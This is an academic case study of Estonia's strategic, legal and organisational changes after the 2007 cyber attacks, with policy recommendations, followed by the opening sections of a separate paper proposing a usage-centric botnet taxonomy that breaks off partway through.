Abstract: At the time of the state-wide cyber attacks in 2007, Estonia was one of the most developed nations in Europe regarding the ubiquitous use of information and communication technology (ICT) in all aspects of society. Relying on the Internet for a wide range of business transactions was, and still is, common practice. Some of the relevant indicators include: 99% of all banking done by electronic means, over a hundred public e-services available, and the first online parliamentary elections in the world. Naturally, however, the more a society depends on ICT, the more vulnerable it becomes to cyber attacks. Unlike other research on the Estonian incident, this case study does not focus on the analysis of the events themselves. Instead it looks at Estonia's cyber security policy and the subsequent changes made in response to the cyber attacks that hit Estonia in 2007. As such, the paper provides a comprehensive overview of the strategic, legal and organisational changes based on the lessons Estonia learned after the 2007 cyber attacks. The analysis provided herein is based on a review of the strategies governing national security, changes in Estonia's legal framework, and the organisations with a direct impact on cyber security. The paper discusses six important lessons learned that manifested in actual changes, each followed by a set of cyber security policy recommendations aimed at national security analysts as well as nation states developing their own cyber security strategy.
Keywords: Estonia, cyber attacks, lessons learned, strategy, legal framework, organisational changes
1. Introduction
Over three weeks in the spring of 2007, Estonia was hit by a series of politically motivated cyber attacks. Web defacements carrying political messages targeted websites of political parties, and governmental and commercial organisations suffered from different forms of denial of service or distributed denial of service (DDoS) attacks. Among the targets were Estonian governmental agencies and services, schools, banks, Internet Service Providers (ISPs), as well as media channels and private web sites (Evron, 2008; Tikk, Kaska, & Vihul, 2010).
The Estonian government's decision to move a Soviet World War II memorial from its previous location in central Tallinn to a military cemetery triggered street riots in Estonia, violence against the Estonian Ambassador in Moscow, indirect economic sanctions by Russia, as well as a campaign of politically motivated cyber attacks against Estonia (Ottis, 2008). By April 28th the cyber attacks against Estonia were officially recognized as being more than just random criminal acts (Kash, 2008). The details of the weeks that followed are described in (Tikk, Kaska, & Vihul, 2010).
The methods used in this incident were not really new. However, considering Estonia's small size and high reliance on information systems, the attacks posed a significant threat. Estonia did not consider the event an armed attack and thus refrained from requesting NATO's support under Art. 5 of the NATO Treaty; instead, the attacks were simply regarded as individual cyber crimes (Nazario, 2007; Tikk, Kaska, & Vihul, 2010) or "hacktivism", as defined by the well-known information security analyst Dorothy Denning (Denning, 2001). A further discussion on whether or not the 2007 attacks constituted an armed attack is beyond the scope of this paper. Many defence and security analysts have covered this particular topic and discussed, e.g., the "juridical notion of information warfare" (Hyacinthe, 2009) and "taxonomies of lethal information technologies" (Hyacinthe & Fleurantin, 2007), formulated a "Proposal for an International Convention to Regulate the Use of Information Systems in Armed Conflict" (Brown, 2006), or examined the "legal limitations of information warfare" (Ellis, 2006).
The incident quickly drew worldwide attention, and the media labelled the attacks the first "Cyber War" (Landler & Markoff, 2007). This led to an overall "cyber war hype" that was continuously carried forward by media, researchers and policymakers. The same exaggerated rhetoric was employed during later conflicts such as Georgia in 2008 or Kyrgyzstan in 2009, and such misuse of terminology has already received a fair amount of criticism (Farivar, 2009).
Christian Czosseck et al.
The 2007 attacks have shown that cyber attacks are not limited to single institutions, but can evolve to a level that threatens national security. Looking back, the Estonian state was not seriously affected, since for the most part state functions and objects of critical information infrastructure were not interrupted or disturbed (Odrats, 2007). However, nation states did receive a wake-up call on the new threats emerging from cyber space, along with new types of opponents.
The following three sections provide a comprehensive overview of the major changes in Estonia's national cyber security landscape, starting with the changes in national policy. As a result of these, several laws and regulations were introduced, while others were amended, and there were several changes in the organisational landscape.
This paper features six lessons learned that were identified as the most remarkable in the case study of Estonia. It concludes with several strategic cyber security recommendations.
2. Development of national strategies
The benefits as well as the threats of the use of Internet-related applications to information societies are identified by a number of Estonian high-level policies and strategies.
The Estonian Information Society Strategy 2013 (MoEAC, 2006), in force since January 2007, promotes the broad use of ICT for the development of a knowledge-based society and economy. Given that cyber attacks on a scale matching that of Estonia in 2007 were unseen and likely unpredicted at the time, it is not surprising that the risk of massive cyber attacks was not taken into serious consideration in the strategy, nor in other national policy documents from that era (see e.g. the implementation plan of the Information Society Strategy for 2007-2008, MoEAC, 2007).
The National Security Concept of Estonia published in 2004 (MoD, 2004) and the government's action plan in force at the time (Estonian Government, 2007) were no exception, since these documents did not even mention possible cyber threats or related actions.
It was only after the 2007 cyber attacks that cyber security instantly found its way into the national security spotlight.
2.1 Policy and strategy responses since 2007
In July 2007, shortly following the cyber attacks, the Government approved the Action Plan to Fight Cyber-attacks (Kaska, Talihärm, & Tikk, 2010). In September 2007, the revised Implementation Plan 2007-2008 of the Estonian Information Society Strategy 2013 (MoEAC, 2007) was approved. The document holds a generic statement that critical information infrastructure should be developed in such a way that it operates smoothly in "emergency situations" (MoI, 2009).
2.1.1 Cyber security strategy
In May 2008, the Estonian government adopted the newly drafted Cyber Security Strategy (CSS) as a comprehensive policy response to the cyber attacks. The strategy was prepared by a multi-stakeholder committee including relevant ministries, agencies and private sector representatives.
The CSS considers cyber security a national effort responding to the asymmetric threat posed by cyber attacks. The strategy underlines that state-wide cyber security requires active international cooperation and the promotion of global responses. On a national level, the strategy suggests implementing organisational, technical and legal changes. Further, it aims at developing an over-arching and sophisticated cyber security culture (MoD, 2008).
Based on a post-attack assessment of the situation in Estonia, the CSS identified five strategic objectives:
  The development and large-scale implementation of a system of security measures;
  Increasing competence in cyber security;
  Improvement of the legal framework for supporting cyber security;
  Bolstering international cooperation; and
  Raising awareness on cyber security.
In May 2009, the CSS implementation plan for the 2009-2011 cycle was adopted by the government. The plan called for concrete actions in five priority areas and became the main source for the comprehensive cyber security approach in Estonia (Estonian Government, 2009).
2.1.2 National Security Concept
The National Security Concept, which was updated and approved in May 2010, represents the Estonian government's second major cyber security policy response. It recognizes Estonia's growing reliance on ICT along with the increasing threat posed by terrorists and organised crime groups. Cyber crime should receive special attention, and solutions are to be found in co-operation between agencies on both the national and international level. Cyber security shall be ensured by "[...] reducing vulnerabilities of critical information systems and data communication connections". Critical systems shall stay operational, even if the connection to foreign countries is temporarily malfunctioning or has ceased to function. To support these actions, the necessary legislation should be developed and public awareness raised (MoD, 2010).
The National Security Concept led to the revised Guidelines for Development of Criminal Policy until 2018, published in October 2010. The Police shall focus on preventing the spread of malware and the growing number of "hacking" incidents. Furthermore, "[t]he existence of a sufficient number of IT specialists in law enforcement agencies shall be ensured in order to set bounds to cyber crime more efficiently" (MoJ, 2010). Other strategies like the Estonian Information Society Strategy 2007-2013 have received only minor cyber security related amendments.
In addition, since the 2007 attacks, Estonia has become one of the major advocates of cyber security on the international level. As one result, NATO initiated the development of a unified strategy against cyber attacks (Blomfield, 2007), and in 2010 NATO adopted the new strategic concept that recognizes cyber attacks as a threat to the alliance and opts for the enhancement of the alliance's and nations' capabilities to face the threat (NATO, 2010).
Moreover, Estonia has actively supported a number of international organisations such as the Council of Europe in its fight against cyber crime (MoFA, 2010a), the Association of Southeast Asian Nations in promoting the harmonization of laws concerning cyber crime (MoFA, 2010b) and the United Nations in contributing an expert to the task force on Developments in Information and Communication Technology in the Context of International Security (MoFA, 2010c).
3. Development in the legal field
The 2007 attacks prompted major changes in the Estonian legislative landscape and in some cases reinforced changes already underway. Legal amendments involved several areas of law related to cyber security (see Table 1): criminal law (including aspects of criminal procedure) and crisis management law. The Estonian incident did not, however, directly touch upon the legal regime applicable to armed conflicts, since the attacks were treated by national authorities as acts of crime.
Other laws such as the Electronic Communications Act were also updated but did not involve considerable changes in the context of cyber security (Estonian Government, 2010).
Table 1: Law related to cyber security (Kaska, Talihärm, & Tikk, 2010)
Constitutional law: fundamental rights and freedoms; organisation of the state; execution of public authority
Private law:
  Information society services
  eComms infrastructure provision
  Provision of eComms services to end users
  General private law supporting the functioning of the information society (eCommerce, digital signatures)
Public administrative law:
  General administrative procedure law supporting the accessibility of the information society
  Availability of public information and public e-services
  Data processing and data protection
Criminal law:
  Substantive criminal law
  Criminal procedure law
  International cooperation
Crisis management law:
  Critical infrastructure protection (CIP)
  Critical information infrastructure protection (CIIP)
War-time law / national defence law:
  National defence organisation
  National defence in peacetime
  National defence in conflict/wartime
3.1 Penal code
Mostly due to the need to harmonize the Estonian Penal Code with the Council of Europe Convention on Cyber Crime (Council of Europe, 2001) and the Council Framework Decision 2005/222/JHA on attacks against information systems (Council of Europe, 2005), all cyber crime related provisions in the Penal Code were reviewed. The amendments targeted the provisions addressing attacks against computer systems and data, widened the scope of specific computer crime provisions (e.g. criminalizing the dissemination of spyware and malware), added a new offence of the preparation of cyber crimes, modified the provision concerning acts of terrorism and filled an important gap (Estonian Government, n.d.) in the Penal Code by enabling differentiation between cyber attacks against critical infrastructure (with the purpose of seriously interfering with or destroying the economic or social structure of the state) and ordinary computer crime (MoI, 2009).
3.2 Amendments relevant to criminal procedure law
The amendments in the Penal Code resulted partly from the regulatory limitations that arose in relation to the application of the Code of Criminal Procedure (CCP) to the 2007 attacks (MoJ, 2010b), as CCP §§ 110-112 maintain that evidence may be collected by surveillance activities in a criminal proceeding if the collection of evidence is a) precluded or especially complicated and b) the criminal offence under investigation is, at the minimum, an intentionally committed crime for which the law prescribes a punishment of at least three years' imprisonment (MoJ, 2010b). However, during the Estonian attacks in 2007 it became apparent that almost none of the committed offences met the "three years' imprisonment" threshold, which precluded the employment of surveillance measures (Estonian Government, 2007b). Therefore, the changes in the Penal Code prescribed higher maximum punishments and also corporate liability for cyber crime offences.
3.3 New Emergency Act
The new Emergency Act (EA) (MoI, 2009) was adopted in June 2009 and reviewed the existing setup of national emergency preparedness and the emergency management structure, including the responses to cyber threats.
Offering a comprehensive approach, the act foresees a system of measures which include preventing emergencies, preparing for emergencies, responding to emergencies and mitigating the consequences of emergencies ("crisis management") (MoI, n.d.). It is the providers of public services and information infrastructure owners that are tasked with everyday emergency prevention and ensuring a stable level of service continuity. Providers of vital services are obliged, among other assignments, to prepare and present a continuous operation risk assessment (EA § 38) and an operation plan (EA § 39), to notify the citizens about events significantly disturbing service continuity, as well as to provide the necessary information to supervisory bodies. In addition to the above, there are certain provisions that specifically address threats against information systems, such as an obligation for the providers of vital services to guarantee the smooth application of security measures in the information systems and information assets used for the provision of vital services.
4. Development of organisations
Before the 2007 cyber attacks, Estonia had relatively few organisations dedicated to (national) cyber defence. Since then, Estonia has made some key organisational changes to better deal with cyber threats. The most significant ones are described below.
A high-level organisational change was the formation of the Cyber Security Council under the Government Security Committee, a body foreseen by the National Cyber Security Strategy. The Council reports directly to the Government Security Committee and is therefore well placed for coordinating inter-agency and international cyber incident response.
4.1 EIC, CERT-EE and CIIP
The Estonian Informatics Centre (EIC) is a state agency that is responsible for managing and developing public information services and systems (MoEAC, 2009). It is also tasked with providing cyber security for these services and systems. Even though a national CERT had been established in 2006 as a department of the EIC, its capabilities and experience were still quite modest at the time of the attacks. In 2009, as a result of the National Cyber Security Strategy, the Department of Critical Information Infrastructure Protection (CIIP) was added to the structure of the EIC, in addition to the already existing CERT. The main tasks of the new department include supervising risk analyses of critical information infrastructures and developing protective measures.
4.2 Cyber defence league
During the cyber attack campaign, the Estonian CERT was assisted by an informal network of volunteer cyber security experts. This provided much needed additional capabilities, such as increased situational awareness, analysis capability, quick sharing of defensive techniques between targeted entities, as well as an extended network of direct contacts to international partners.
The roots of this informal group go back to the late 1990s, when Estonia was adopting a national ID card system. Over the years, the network of professionals had also cooperated against criminally motivated cyber attacks targeting critical infrastructures (e.g., Estonian banks). A later development was the formalisation of this loose cooperation into the Cyber Defence League (CDL) in 2009. The Defence League is a volunteer national defence organisation in the military chain of command. The CDL is part of the Defence League and unites cyber security specialists who are willing to contribute their time and skills to the protection of the high-tech way of life in Estonia, especially by assisting the defence of critical information infrastructure. It is important to note that this is a defensive organisation, not designed to harass political adversaries in (anonymous) cyber attack campaigns. In January 2011, the CDL was reorganized into the Cyber Defence Unit of the Defence League, but the CDL name is still widely used.
The CDL's key activities include organizing training and awareness events, as well as cyber defence exercises. In 2010, the CDL was involved with the Baltic Cyber Shield exercise organised by the Cooperative Cyber Defence Centre of Excellence (Geers, 2010), the US-led International Cyber Defence Workshop, as well as a series of national exercises. The CDL is a good example of managing in a productive manner the expertise and enthusiasm of motivated cyber security specialists.
5. Six recommendations
Given that the major changes have been discussed above, this section features six significant lessons learned from the 2007 cyber attacks against Estonia:
5.1 Comprehensive strategy approach
It is evident that Estonia has taken into account the lessons learned from the 2007 incident, the most significant step being the quick establishment of a comprehensive policy response, which has led to the adoption and subsequent implementation of the national Cyber Security Strategy. The Estonian example emphasises the need for nation-wide cooperation and countermeasures against cyber crime, involving the major stakeholders of the public and private sector.
It remains to be debated whether cyber security should be handled in a single comprehensive strategy or form a sub-section of all other relevant strategies touching upon ICT. However, considering the speed of technological advancement and comparing it with the speed of developing national strategies, the Estonian approach of having a single strategy might be the more advisable one.
The 2007 attacks triggered the drafting of the cyber security strategy in Estonia. However, countries should not wait for such triggers and should pro-actively conduct a thorough and comprehensive risk assessment of their cyber infrastructure. Furthermore, often only the context and additional information will reveal whether an attack was launched with a criminal, espionage, terrorist or military motivation. Therefore, close cooperation between relevant agencies remains a sine qua non for success in this arena.
5.2 Politically motivated cyber attacks
Another aspect to consider is the shift of attention in terms of cyber security threats over the last decade. While in the first half of the decade the cyber security focus was on criminal and espionage attacks (if recognised as a national security issue at all), the second half witnessed a surge in politically motivated cyber attacks (Nazario, 2009). The significance of this development is that the targets have changed. A politically motivated attacker is likely to attack visible and politically significant targets (such as the public website of a government agency or a company that has angered an interest group), which are of little interest to criminals and intelligence agencies. This shift in targets requires everyone to reassess their risks and security requirements.
Politically motivated actors can cover the entire spectrum of cyber attack, from high-profile strikes against critical infrastructure to millions of pinprick attacks that can weaken the state over a long period of time (Lemay, Fernandeza, & Knight, 2010; Liles, 2010; Ottis, 2009). As the threat of politically motivated attacks threatening national security is not likely to go away in the foreseeable future, it must be addressed as a national security issue in order to get the full attention of policymakers.
5.3 Legal recommendations
An analysis of the Estonian legal order governing the domain of the information society underlines that a secure information society needs to be comprehensively supported by norms involving several legal disciplines. The broad approach illustrated by the Estonian legal framework brings together the areas of private and public law, and completes the spectrum of cyber incident regulation by engaging criminal law, crisis management regulation and wartime law/national defence legal order. It is vital for countries to realize that international cyber security regulation involves a wide range of legal areas; the review of relevant regulatory frameworks and the identification of possible uncovered "grey areas" is highly recommended.
Within national legal systems, a review of criminal law (penal law) appears to be a central issue. Attacks against critical (information) infrastructure, politically motivated cyber attacks, possible cases of cyber terrorism, as well as related provisions for investigation and prosecution, should all be reflected in domestic criminal law or other national acts. Broad and inclusive national implementation of the Council of Europe Convention on Cybercrime is of crucial importance, especially considering the cross-border nature of cyber crime.
Additionally, the Estonian experience underlined the need to establish common security standards for all computer users, information systems and critical infrastructure companies (MoD, 2008). By 2011, steps have been taken to establish such standards for service providers within the framework of the Electronic Communications Act, but more detailed rules for end-users' conduct and/or legal obligations are still needed.
5.4 Exercises and education for the masses
A key component of enhancing (national) cyber security is cyber security awareness and education. This should not be limited to professionals in governmental or private institutions, but must cover the whole spectrum from a citizen using ICT for everyday things to senior policy makers, considering the skills and knowledge needed at every level. This includes law enforcement agencies and especially the judicial system, which has a central role in interpreting the regulatory aspects of cyber security. By developing different solutions well suited for each group, a broad and sophisticated cyber security culture can be implemented, as aimed for in the CSS.
Estonia recognized its lack of a sufficient number of well-trained information security experts and developed a new Master's program for Cyber Security Studies in 2008. The Cyber Defence League is another venue for actively training experts in cyber security. Further measures, such as information campaigns for the secure use of the Internet, special classes in high school or vocational training, should be considered by Estonia and other nation states.
Additionally, cyber security exercises organised on both the national and international level serve as effective preparation for responding to cyber attacks. Exercises like Cyber Europe 2010 (ENISA, 2010) require efficient coordination between agencies and private stakeholders and should be conducted regularly.
5.5 International relations

The attacks against Estonia in 2007 underlined the importance of international cooperation, as it became even more apparent that in the context of responding to cyber threats, one country can do little alone. To that end, active participation in the work of major organizations dealing with cyber security requires keeping national developments and the legal framework up to date, and serves as useful ground for new initiatives, further collaboration and regional or global fora. Moreover, the ratification of instruments such as the Council of Europe Convention on Cybercrime, which aim to harmonise cyber crime regulation worldwide, should be supported and promoted.
Christian Czosseck et al.
Besides the political will for cooperation, national multi- and bilateral agreements, information sharing agreements, cooperation of law enforcement agencies, joint investigation teams, international exercises, formal and informal networks and other international initiatives are vital for the effective investigation and prosecution of cyber crime offences.
5.6 Harnessing the volunteers

It is well known that most of the Internet infrastructure is owned and operated by the private sector. It follows that there is a pool of experts in the private sector who could provide a meaningful contribution to national cyber security, regardless of their actual position in the private sector. This also includes experts in the public sector who do not work in their area of expertise. Clearly, there are limits to the use of volunteers, whether their potential role is in offensive or defensive activities (Ottis, 2009). However, if proper legal, policy and operational frameworks are in place, volunteers can significantly increase national cyber security capability.
6. Conclusions

While in hindsight the cyber attacks against Estonia were not as severe as often portrayed, they still triggered an understanding of threats from cyber space as threats potentially affecting national security, and prompted a wake-up call concerning the risks associated with the "careless use" of digital information technologies (e.g., the Internet). For instance, the risk posed by politically motivated individuals should be regarded as a possible element of a serious threat to cyber security. By reviewing the strategic, legal and organisational changes that Estonia has undergone after the 2007 cyber attacks, this paper provides a concise list of key changes that have taken place on the legislative and administrative levels. While this paper describes some new assets that so far appear to be unique to Estonia, such as the formation of the Cyber Defence League, it also offers several recommendations to national security planners working beyond Estonia's national boundaries. Many of the aforementioned recommendations are not new, but they have passed a practical test through the real-life Estonian case study. Accordingly, these recommendations are more than a set of purely theoretical proposals. Lastly, based on the foregoing analysis, it is important to stress that the cyber security of a nation state can only be achieved by an interlocked approach covering national policies, the legal framework and organisations involving both public and private actors, as well as the necessary changes identified by a realistic risk assessment.
Disclaimer

The opinions expressed here are those of the authors and should not be considered the official policy of the Cooperative Cyber Defence Centre of Excellence or NATO.

Acknowledgement

We would like to thank Mrs. Kadri Kaska and the anonymous reviewer for the substantial comments they provided us with in the course of writing this paper.
References

Blomfield, A. (2007). Estonia calls for Nato cyber-terrorism strategy. Retrieved from http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.
Brown, D. (2006). "A Proposal for an International Convention to Regulate the Use of Information Systems in Armed Conflict", Harvard International Law Journal, 47(1), 179-221.
CDL. (n.d.). Cyber Defence League. Retrieved from http://www.kaitseliit.ee/index.php?op=body&cat_id=395.
Council of Europe. (2001). Convention on Cybercrime. Retrieved from http://conventions.coe.int/treaty/en/treaties/html/185.htm.
Council of Europe. (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks against information systems. Official Journal L 69, 67-71.
Denning, D. E. (2001). Activism, hacktivism, and cyberterrorism: the internet as a tool for influencing foreign policy. Networks and netwars: The future of terror, crime, and militancy, 239-288.
Ellis, B. (2001). "The International Legal Implications and Limitations of Information Warfare: What Are Our Options?". Retrieved Mar. 2, 2011 from http://www.iwar.org.uk/law/resources/iwlaw/Ellis_B_W_01.pdf.
ENISA. (2010). EU Cyber Security Exercise 'Cyber Europe 2010'. Retrieved January 31, 2011, from http://www.enisa.europa.eu/media/press-releases/cyber-europe-20102019-cyber-security-exercise-with-320-2018incidents2019-successfully-concluded.
Estonian Government. (2007a). Programme of the Coalition for 2007-2011.
Estonian Government. (2007b). Explanatory Memorandum to the Draft Act on the Amendment of the Penal Code (116 SE) (In Estonian). Retrieved from http://www.riigikogu.ee/?page=pub_file&op=emsplain&content_type=application/msword&u=20090902161440&file_id=198499&file_name=KarS seletuskiri (167).doc&file_sise=66048&mnsensk=166+SE&etapp=03.12.2007&fd=29.10.2008.
Estonian Government. (2009). Valitsus kiitis heaks küberjulgeoleku strateegia rakendusplaani aastateks 2009–2011 [The Government approved the implementation plan of the cyber security strategy for 2009–2011] (In Estonian). Retrieved from http://uudisvoog.postimees.ee/?DATE=20090514&ID=204872.
Estonian Government. (2010). Explanatory Memorandum to the Act amending the Electronic Communications Act (424 SE) (In Estonian). Retrieved from http://www.riigikogu.ee/?page=pub_file&op=emsplain&content_type=application/msword&file_id=535868&file_name=elektroonilise side muutmine seletuskiri (424).doc&file_size=31650&mnsensk=424+SE&fd=.
Evron, G. (2008). Battling botnets and online mobs: Estonia's defense efforts during the internet war. Georgetown Journal of International Affairs, 9(1), 121-126.
Farivar, C. (2009). A Brief Examination of Media Coverage of Cyberattacks (2007 - Present). In C. Czosseck & K. Geers (Eds.), The Virtual Battlefield: Perspectives on Cyber Warfare (pp. 182-188). IOS Press.
Geers, K. (2010). Live Fire Exercise: Preparing for Cyber War. Journal of Homeland Security and Emergency Management, 7(1).
Hyacinthe, B. (2009). Cyber Warriors at War. Xlibris, pp. 82-85.
Hyacinthe, B. & Fleurantin, L. (2007). Initial supports to regulate information warfare's potentially lethal information technologies and techniques. Proceedings of the 3rd International Conference on Information Warfare and Security (pp. 206-207). Academic Conferences Limited.
Kash, W. (2008). Lessons from the cyberattacks on Estonia. Retrieved from http://gcn.com/articles/2008/06/13/laurialmann--lessons-from-the-cyberattacks-on-estonia.aspx.
Kaska, K., Talihärm, A.-M., & Tikk, E. (2010). Building a Comprehensive Approach to Cyber Security. CCD COE Publications.
Landler, M., & Markoff, J. (2007). In Estonia, what may be the first war in cyberspace. The New York Times. Retrieved from http://www.nytimes.com/2007/05/28/business/worldbusiness/28iht-cyberwar.4.5901141.html.
Lemay, A., Fernandez, J. M., & Knight, S. (2010). Pinprick attacks, a lesser included case? In C. Czosseck & K. Podins (Eds.), Conference on Cyber Conflict Proceedings (pp. 183-194). Tallinn: CCD COE Publications.
Liles, S. (2010). Cyber Warfare: As a form of low-intensity conflict and insurgency. In C. Czosseck & K. Podins (Eds.), Conference on Cyber Conflict Proceedings (pp. 47-57). Tallinn: CCD COE Publications.
MoD. (2004). National Security Concept of the Republic of Estonia.
MoD. (2008). Cyber Security Strategy. Retrieved from http://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdf.
MoD. (2010). National Security Concept. Retrieved from http://www.kmin.ee/files/kmin/nodes/9470_National_Security_Concept_of_Estonia.pdf.
MoEAC. (2006). Estonian Information Society Strategy 2013. Retrieved from http://www.riso.ee/en/system/files/Estonian Information Society Strategy 2013.pdf.
MoEAC. (2007). Implementation Plan 2007-2008 of the Estonian Information Society Strategy.
MoEAC. (2009). Statute for the Development of National Information System (in Estonian). Retrieved from https://www.riigiteataja.ee/akt/13219897.
MoFA. (2010a). Estonia Supports Council of Europe in Fight Against Cyber Crime. Retrieved from http://www.vm.ee/?q=en/node/9315.
MoFA. (2010b). Foreign Minister Paet Invited EU and Southeast Asian Nations to Co-operate in Backing Cyber Defence. Retrieved from http://www.vm.ee/?q=en/node/9512.
MoFA. (2010c). National Experts Shared Cyber Security Recommendations with UN Secretary General. Retrieved from http://www.vm.ee/?q=en/node/9722.
MoI. (2009). Estonian Emergency Act (unofficial translation). Retrieved January 4, 2011, from http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&query=h daolukorra.
MoI. (n.d.). Ministry of the Interior, Department of crisis management and rescue policy (in Estonian). Retrieved January 4, 2011, from http://www.siseministeerium.ee/elutahtsad-valdkonnad-ja-teenused-2.
MoJ. (2010a). Guidelines for Development of Criminal Policy until 2018. Retrieved from http://www.just.ee/arengusuunad2018.
MoJ. (2010b). Estonian Code of Criminal Procedure (unofficial translation). Retrieved from http://www.legaltext.ee/text/en/X60027K6.htm.
NATO. (2010). Strategic Concept for the Defence and Security of the Members of the NATO. Retrieved December 30, 2010, from http://www.nato.int/cps/en/natolive/official_texts_68580.htm.
Nazario, J. (2007). Estonian DDoS Attacks – A summary to date. Retrieved from http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/.
Nazario, J. (2009). Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers (Eds.), The Virtual Battlefield: Perspectives on Cyber Warfare (pp. 163-181). IOS Press.
Odrats, I. (Ed.). (2007). Information Technology in the Public Administration of Estonia Yearbook 2007. Ministry of Economic Affairs and Communication.
Ottis, R. (2008). Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective. Proceedings of the 7th European Conference on Information Warfare (p. 163). Academic Conferences Limited.
Ottis, R. (2009). Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability. 8th European Conference on Information Warfare and Security (pp. 177-182). Academic Publishing Limited.
Tikk, E., Kaska, K., & Vihul, L. (2010). International Cyber Incidents: Legal Considerations (p. 130). Tallinn: CCD COE Publications.
A Usage-Centric Botnet Taxonomy

Christian Czosseck and Karlis Podins
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
Christian.Czosseck@ccdcoe.org
Karlis.Podins@ccdcoe.org
Abstract: Botnets have been a recognized threat to computer security for several years. On the timeline of malware development, they can be seen as the latest evolutionary step. Criminals have taken advantage of this new technology, and cyber crime has grown to become a serious and sophisticated problem which law enforcement still finds difficult to deal with. In the past few years we have been witnessing a shift beyond cyber crime: nation states have become the target of attacks, and they also actively use botnets to project their own power in the political or military domain. To study the new and emerging cases of botnet usage we propose a usage-centric botnet taxonomy. Although a number of botnet taxonomies have already been published, most of them take a technical viewpoint and often consider cyber crime the major driver for the use of botnets. While that may be true for now, we believe that such an approach might not be holistic enough to describe current and future developments. Besides the trend towards specialized botnets being developed, the number of botnet users is increasing, with new motivations coming along. The taxonomy proposed in this paper takes a different viewpoint by focusing less on technical attributes than on the actors using botnets and the functionality they request. The major difference from existing research is that the proposed taxonomy classifies instances of botnet use. Based on existing taxonomies, case studies of recent botnet incidents and the cyber warfare doctrines of selected nation states, we explore theoretical and already observed ways of botnet usage. We propose a new classification of botnets based on their technological attributes, their users and the intended effects on the target, to provide a holistic picture of the current situation. We also test the proposed taxonomy on seven instances of botnet use.

Keywords: botnets, taxonomy, incident categorization
1. Introduction

Botnets, large numbers of remotely controlled computers distributed all over the Internet and centrally controlled by so-called botmasters, are a persistent and continuously evolving threat to the Internet community, always seeming to be one step ahead of countermeasures and take-down attempts. Over the last years we have seen more and more sophisticated botnets, improving in multiple aspects such as size, resistance to countermeasures and ways of spreading. A whole underground economy has developed around botnets (Klein et al. 2011). More and more botnets have become a service offered by knowledgeable malware developers, ready to be rented out to everyone willing to pay (Schwartz 2010; Mills 2009). Besides the technological evolution, the number of players as well as their motivations to use botnets is increasing. Recent history has witnessed several incidents where botnets were not used for financial benefit, but to deliver a political message, to conduct espionage or as an instrument of sabotage. The increasing diversity of botnet incidents calls for a structured botnet classification.

The usage-centric botnet taxonomy presented in this paper is designed to classify botnet events by means of their usage, not botnets per se. In this our approach differs from other published taxonomies on botnets, which mostly focus on technical aspects.

The rest of this paper is structured as follows: in Section 2 we give an overview of related work on botnet taxonomies, motivating the uniqueness of our taxonomy, which is then described in Section 3. We test the performance of the proposed taxonomy in Section 4 by categorizing a selection of recent botnet incidents according to it. Finally, conclusions and a discussion of future work are provided in Section 5.
2. Related work

Technical details of botnets and their highly visible functionality like DDoS attacks are well studied in the scientific literature, but strategic aspects like motivation are rarely covered. (Weaver et al. 2003) present a taxonomy of computer worms. They introduced payload and motivation attributes similar to the functionality and motivation attributes presented in this paper's taxonomy, and offer a more fine-grained classification in their features. On the other hand, we separate users from their motivation, which are combined into one attribute in (Weaver et al. 2003). They also do not consider self-infection.

A detailed technical-level taxonomy of attacks and a thorough literature review of technical-level taxonomies is given by (Hansman & Hunt 2005). A technical defense-centric taxonomy of computer attacks is given in (Killourhy et al. 2004), where the authors discuss network-level attack detection and classification. Several attack types like Denial of Service and Surveillance/Probing (corresponding to Information theft in the proposed taxonomy) are discussed in (Lippmann et al. 1998). (Distributed) Denial-of-Service (DDoS/DoS) attacks have been studied by (Lau et al., Distributed Denial of Service Attacks). (Wun et al. 2007; Asosheh & Ramezani 2008; Wood & Stankovic 2004) offer taxonomies not limited to DDoS as such but covering architectural aspects of botnets like command-and-control structures or spreading strategies. Taxonomies of DoS attacks and countermeasures against them have been presented by (Champagne & Lee 2006; Mirkovic & Reiher 2004). A more detailed description of botnet internals, including a comprehensive list of ways to use botnets, is presented by (Bacher et al. 2005; Barford & Yegneswaran 2007). The fast-flux functionality provided by some botnets is covered in (Holz et al. 2008) and (Nazario & Holz 2008).

The majority of research has considered botnets as collections of machines which are infected without the knowledge or consent of their respective owners (Klein et al. 2011). Recently, in a small number of politically tainted incidents, botnet software has been installed intentionally by the owners themselves (Ottis 2008; Panda Security 2010).
3. A usage-centric botnet taxonomy

Following the criteria for an effective taxonomy as introduced in (Killourhy et al. 2004), our taxonomy was designed to follow the principles of mutual exclusiveness, exhaustiveness and replicability, providing an instrument to classify botnet incidents of the past but also to deal with upcoming events. It consists of four features: 1. Users of botnets, 2. Motivations of botnet usage, 3. Functionality applied, and 4. Way of infection. A complete overview is provided in Figure 1.

Figure 1: Usage-centric botnet taxonomy

3.1 Users of botnets
Over the past years, developing and using botnets have become a profitable business, with a well-developed underground economy providing botnet technology and services to everyone who pays (Mills 2009). This easy access to botnets allows new players and motivations to appear. The first attribute of this taxonomy covers the user of the botnet and is motivated by a legal viewpoint, considering who could be held liable for the action done.
Exclusion of middlemen

Over time it has been witnessed that the underground economy has changed to a new service-oriented model, offering botnets for rent (Schwartz 2010; Mills 2009). This way a third party besides the botnet user and the target gets involved. While these service providers are important players, our taxonomy focuses on the perpetrator only. We disregard the involvement of middlemen in the incidents, although they might be held responsible for the damages caused.
Individuals are private persons using botnets independently. This includes private persons using botnets for financial gain, education or out of curiosity, but also those who want to express their opinion with digital force or support a political or ideological activity, e.g. patriotic hacking, as in the case of the cyber attacks against Estonia in 2007 (Ottis 2008) or the participants in Operation Payback (Correll 2010). From a legal viewpoint, it is the individual who could be held responsible.
